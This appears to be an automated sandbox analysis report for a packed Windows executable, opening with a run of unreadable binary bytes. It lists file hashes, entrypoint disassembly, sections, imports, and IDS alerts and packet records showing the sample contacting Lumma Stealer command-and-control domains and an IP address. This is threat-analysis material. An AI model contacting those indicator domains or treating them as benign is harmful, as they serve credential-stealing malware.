\xaf\xca\xe7\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe7\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe7\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe7\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe7\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xcb\xe7\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe7\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xcb\xe7\xb0\xca\xe7\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe7\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe7\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe7\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe7\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe7\xb0\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xaf\xca\xe6\xaf\xca\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe7\xaf\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xcb\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xaf\xca\xe7\xaf\xca\xe7\xaf\xca\xe6\xaf\xca\xe6\xaf\xcb\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xcb\xe6\xb0\xca\xe7\xaf\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe7\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xb0\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe7\xaf\xca\xe6\xaf\xca\xe7\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe7\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe7\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe7\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xaf\xca\xe7\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe7\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xcb\xe7\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xaf\xcb\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xb0\xca\xe6\xb0\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe7\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca
Version:	3
Thumbprint MD5:	C52F4D30B83A70AF0470658DE69BF663
Thumbprint SHA-1:	9E54C11AE2FF492B3597DC10CEE5EBB837B3BFAC
Thumbprint SHA-256:	7F26021CC1AE0BA2A97162E2CA71CCE97C6A30A498EB321878EB7AC98A6CCECE
Serial:	66EA4ABB0FB7CE8C42D3CDE1769F1FEB

Entrypoint Preview

Instruction
push ebp
pushfd
mov ebp, 11260B80h
call 00007F1A64E21244h
jnle 00007F1A64E349F7h
pushfd
xchg eax, esi
lodsd
lds esi, fword ptr [edi+46h]
loope 00007F1A64E34A5Ah
sbb ecx, dword ptr [eax-39h]
inc esp
and al, 00h
loopne 00007F1A64E349A8h
xor cl, ch
call 00007F1A64D95E37h
inc ebp
xor dl, al
bts di, di
call 00007F1A64E2922Ah
in eax, 1Fh
rcl dword ptr [eax-69BC8AEFh], cl
mov cl, EEh
xor dword ptr [edi], esi
add eax, 1DC8DDCCh
inc ebp
add eax, esi
cmc
mov eax, 8AB8E7F3h
jnle 00007F1A64E349BAh
add ebx, edx
mov al, DAh
mov edi, 8F00769Eh
call far 96D8h : CB007698h
sbb al, B0h
mov cl, 4Fh
bound esi, dword ptr [ecx]
pop esi
arpl word ptr [edi+1A2F4369h], cx
in al, dx
sub dword ptr [edx], ebp
shld dx, ax, cl
call 00007F1A64D5A78Ah
jmp 00007F1A64D98136h
mov ecx, 2BB3C7B8h
mov ecx, dword ptr [ecx+ebp-2BB3C7B8h]
mov edi, E8B63391h
imul di, di
mov edi, dword ptr [ebp+04h]
jc 00007F1A64C4873Bh
mov eax, 942C2986h
call 00007F1A64E06781h
jmp 00007F1A64E2D0FEh
not edx
jmp 00007F1A64C422B7h
test ebx, ebx
lea esp, dword ptr [esp+04h]
je 00007F1A64D46E83h
mov eax, dword ptr [ebp+ebx*4+00h]
call 00007F1A64C3669Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2e54fc	0x8c	.vmp$PH
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x38e000	0x8940	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x24e000	0x6e68	.vmp$PH
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x38c000	0x1a18	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x140000	0x44	.vmp$PH
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x35af2	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x37000	0x296b	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3a000	0xa254	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.vmp$PH	0x45000	0xfa30b	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.vmp$PH	0x140000	0x234	0x400	4a3b4254d0505fb177a355c1e8b8c1dd	False	0.0634765625	data	0.34905982431271465	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.vmp$PH	0x141000	0x24ad80	0x24ae00	f27a27a2bdedeb219de2e9f64e257088	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc	0x38c000	0x1a18	0x1c00	0c51f8f87abe17c6a9c18e9ea241d13c	False	0.37583705357142855	data	5.725189163263045	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x38e000	0x8940	0xe00	7476abb1f0dafc6e668fb56f2a6110b8	False	0.3247767857142857	data	3.5735703364825677	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
AFX_DIALOG_LAYOUT	0x38ed08	0x2	data			5.0
AFX_DIALOG_LAYOUT	0x38ed0c	0x2	data			5.0
RT_DIALOG	0x38ed10	0x8e	data			0.08450704225352113
RT_DIALOG	0x38eda0	0x1ea	data			0.125
RT_DIALOG	0x38ef8c	0x1bc	empty			0
RT_STRING	0x38f148	0x44c	empty			0
RT_STRING	0x38f594	0x422	empty			0
RT_STRING	0x38f9b8	0x45e	empty			0
RT_STRING	0x38fe18	0x426	empty			0
RT_STRING	0x390240	0x3c2	empty			0
RT_STRING	0x390604	0x2d6	empty			0
RT_STRING	0x3908dc	0x62	empty			0
RT_RCDATA	0x390940	0x6000	empty	English	United States	0
RT_MESSAGETABLE	0x38e3a4	0x74c	Matlab v4 mat-file (little endian) T, text, rows 200, columns 225, imaginary	English	United States	0.30085653104925053
RT_MANIFEST	0x38eaf0	0x216	ASCII text, with CRLF line terminators			0.5411985018726592

Imports

DLL	Import
KERNEL32.dll	ExitProcess
ole32.dll	CoCreateInstance
OLEAUT32.dll	SysAllocString
USER32.dll	CloseClipboard
GDI32.dll	BitBlt
KERNEL32.dll	HeapAlloc, HeapFree, ExitProcess, GetModuleHandleA, LoadLibraryA, GetProcAddress

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
03/22/24-13:54:05.472247	TCP	2051588	ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI)	49735	443	192.168.2.4	172.67.147.173
03/22/24-13:54:10.961651	TCP	2051588	ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI)	49739	443	192.168.2.4	172.67.147.173
03/22/24-13:54:02.814250	UDP	2051587	ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (colorfulequalugliess .shop)	57667	53	192.168.2.4	1.1.1.1
03/22/24-13:54:03.114371	TCP	2051588	ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI)	49732	443	192.168.2.4	172.67.147.173
03/22/24-13:54:09.869399	TCP	2051588	ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI)	49738	443	192.168.2.4	172.67.147.173
03/22/24-13:54:02.910864	UDP	2051586	ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (wisemassiveharmonious .shop)	63995	53	192.168.2.4	1.1.1.1
03/22/24-13:54:08.102502	TCP	2051588	ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI)	49737	443	192.168.2.4	172.67.147.173
03/22/24-13:54:03.862026	TCP	2051588	ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI)	49733	443	192.168.2.4	172.67.147.173
03/22/24-13:54:06.419545	TCP	2051588	ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI)	49736	443	192.168.2.4	172.67.147.173
03/22/24-13:54:04.720277	TCP	2051588	ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI)	49734	443	192.168.2.4	172.67.147.173
03/22/24-13:54:03.009215	UDP	2051584	ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (relevantvoicelesskw .shop)	51440	53	192.168.2.4	1.1.1.1

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 22, 2024 13:54:03.110776901 CET	49732	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:03.110806942 CET	443	49732	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:03.110888958 CET	49732	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:03.114371061 CET	49732	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:03.114389896 CET	443	49732	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:03.308084011 CET	443	49732	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:03.308224916 CET	49732	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:03.312488079 CET	49732	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:03.312505960 CET	443	49732	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:03.312827110 CET	443	49732	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:03.353223085 CET	49732	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:03.365398884 CET	49732	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:03.365426064 CET	49732	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:03.365523100 CET	443	49732	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:03.836723089 CET	443	49732	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:03.836770058 CET	443	49732	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:03.836796045 CET	443	49732	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:03.836817980 CET	49732	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:03.836819887 CET	443	49732	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:03.836833000 CET	443	49732	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:03.836860895 CET	49732	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:03.836874008 CET	443	49732	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:03.836932898 CET	49732	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:03.836937904 CET	443	49732	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:03.836949110 CET	443	49732	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:03.837002039 CET	49732	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:03.838841915 CET	49732	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:03.838852882 CET	443	49732	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:03.838884115 CET	49732	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:03.838888884 CET	443	49732	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:03.861594915 CET	49733	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:03.861637115 CET	443	49733	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:03.861722946 CET	49733	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:03.862025976 CET	49733	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:03.862036943 CET	443	49733	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.046919107 CET	443	49733	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.046996117 CET	49733	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:04.049755096 CET	49733	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:04.049765110 CET	443	49733	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.050014019 CET	443	49733	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.051899910 CET	49733	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:04.051924944 CET	49733	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:04.051975012 CET	443	49733	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.530145884 CET	443	49733	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.530189991 CET	443	49733	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.530217886 CET	443	49733	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.530252934 CET	49733	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:04.530277967 CET	443	49733	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.530314922 CET	443	49733	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.530329943 CET	49733	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:04.530337095 CET	443	49733	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.530370951 CET	443	49733	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.530392885 CET	49733	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:04.530400991 CET	443	49733	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.530428886 CET	443	49733	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.530441999 CET	49733	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:04.530447960 CET	443	49733	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.530494928 CET	49733	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:04.530499935 CET	443	49733	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.530844927 CET	443	49733	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.530880928 CET	443	49733	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.530889988 CET	49733	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:04.530898094 CET	443	49733	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.530925035 CET	443	49733	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.530935049 CET	49733	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:04.530941963 CET	443	49733	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.530982971 CET	49733	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:04.530989885 CET	443	49733	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.531004906 CET	443	49733	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.531047106 CET	49733	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:04.531548023 CET	49733	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:04.531564951 CET	443	49733	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.531574011 CET	49733	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:04.531579018 CET	443	49733	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.719826937 CET	49734	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:04.719861031 CET	443	49734	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.719938993 CET	49734	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:04.720277071 CET	49734	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:04.720293999 CET	443	49734	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.907758951 CET	443	49734	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.907923937 CET	49734	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:04.909526110 CET	49734	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:04.909533024 CET	443	49734	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.909780979 CET	443	49734	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.911336899 CET	49734	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:04.911494970 CET	49734	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:04.911531925 CET	443	49734	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:04.911587954 CET	49734	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:04.911600113 CET	443	49734	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:05.354271889 CET	443	49734	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:05.354338884 CET	443	49734	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:05.354410887 CET	49734	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:05.354607105 CET	49734	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:05.354623079 CET	443	49734	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:05.354640007 CET	49734	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:05.354648113 CET	443	49734	172.67.147.173	192.168.2.4
Mar 22, 2024 13:54:05.471735001 CET	49735	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:05.471767902 CET	443	49735	172.67.147.173	192.168.2.4
